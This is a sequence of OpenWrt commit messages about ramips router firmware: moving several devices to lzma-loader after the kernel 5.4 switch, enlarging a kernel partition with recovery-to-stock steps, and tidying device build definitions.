Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
These definitions are not required since swconfig is selected for
the target anyway and kmod-swconfig is pulled as dependency by
kmod-switch-rtl8366rb.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Three of the I-O DATA devices with NAND flash share a lot of
variables. Create a common definition for them to reduce duplicate
code.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The official sysupgrade images for I-O DATA devices manufactured by
MSTC (MitraStar Technology Corp.) cannot be booted normally and the
kernel panics after switching to kernel 5.4.
This commit fixes the issue by using lzma-loader.
Note:
These devices use Z-LOADER to read the kernel from NAND flash and boot
it. Z-LOADER cannot load and start plain lzma-loader, so additional
lzma-compression is needed.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
Co-developed-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Tested-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [wn-ax2033gr]
In several Japanese routers with MT7621 SoC, the official sysupgrade
image cannot be booted properly after switching to kernel 5.4.
This commit fixes the issue by using lzma-loader.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
This device has trouble extracting big kernel from flash,
and supports LZMA compressed kernels only.
Using OpenWrt kernel loader saves us 64 KB compared to the dictionary
size limiting workaround.
Factory image sizes (commit: 5f126c541a) with "CONFIG_ALL_KMODS=y":
- original ("-d23", default): 4784188 bytes, LZMA ERROR 1
- with "-d19": 4915260, LZMA ERROR 1
- with "-d18": 4915260, diff to original: +128 KB
- with "-d17": 4980796, diff to original: +192 KB
- with this patch: 4849724, diff to original: +64 KB
To save some CPU cycle, use minimal compression ("-a0") for the LZMA
compressed uImage.
The most robust solution would use a different loader,
which reads the compressed kernel directly from the flash.
See the thread at [0] for more details!
[0] http://lists.infradead.org/pipermail/openwrt-devel/2020-April/022926.html
Signed-off-by: Szabolcs Hubai <szab.hu@gmail.com>
Tested-by: Stijn Segers <foss@volatilesystems.org>
[fixed identation]
Signed-off-by: David Bauer <mail@david-bauer.net>
kmod-usb-dwc2 and kmod-usb-ledtrig-usbport are not target default packages, and
Belkin F7C027 does not have a USB port anyway. Just drop it.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Currently SUPPORTED_DEVICES only contains the old device string. Fix it by
removing the first assignment.
Fixes: c2334ad60d ("ramips/mt76x8: Synchronize Makefiles with DTS compatible")
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Netgear R7200 is another clone of Netgear R6700v2, introduced in:
6e80df5 ("ramips: add support for NETGEAR R6700v2/AC2400")
Reported-by: Joel Pinsker, github user @joelp64
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
mt7621 overrides KERNEL_DTB to limit dictionary size, which isn't needed
for our lzma loader.
This saves 15KB on mt7621 devices using uimage-lzma-loader.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
Increase kernel partition because 2M is insufficient for 5.4
Because the partition changes, previous version of OpenWrt cannot upgrade
to this version, and requires a new installation
Recovery to stock instruction:
1. Download stock firmware at
http://ur.ikcd.net/HC5962-sysupgrade-20171221-b00a04d1.bin
2. Power off the router
3. Press and hold the reset button for 4~6 sec while power it back on
4. Connect a PC to router's LAN
5. Visit http://192.168.2.1 and upload the firmware
Then repeat the instruction in edae3479e6 to install OpenWrt
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
ubnt er-x/xiaomi/netgear sercomm devices are known to have troble
extracting a big kernel from flash and has support for uncompressed
uimage
This commit uses uncompressed uimage with lzma-loader for these devices
to fix boot issue.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
Some devices have bootloaders with broken lzma code resulting in failed
decompression or corrupted kernel code.
This image recipe allows to sacrifice 5KB for OpenWrt LZMA loader and
take over the task of decompress kernel.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>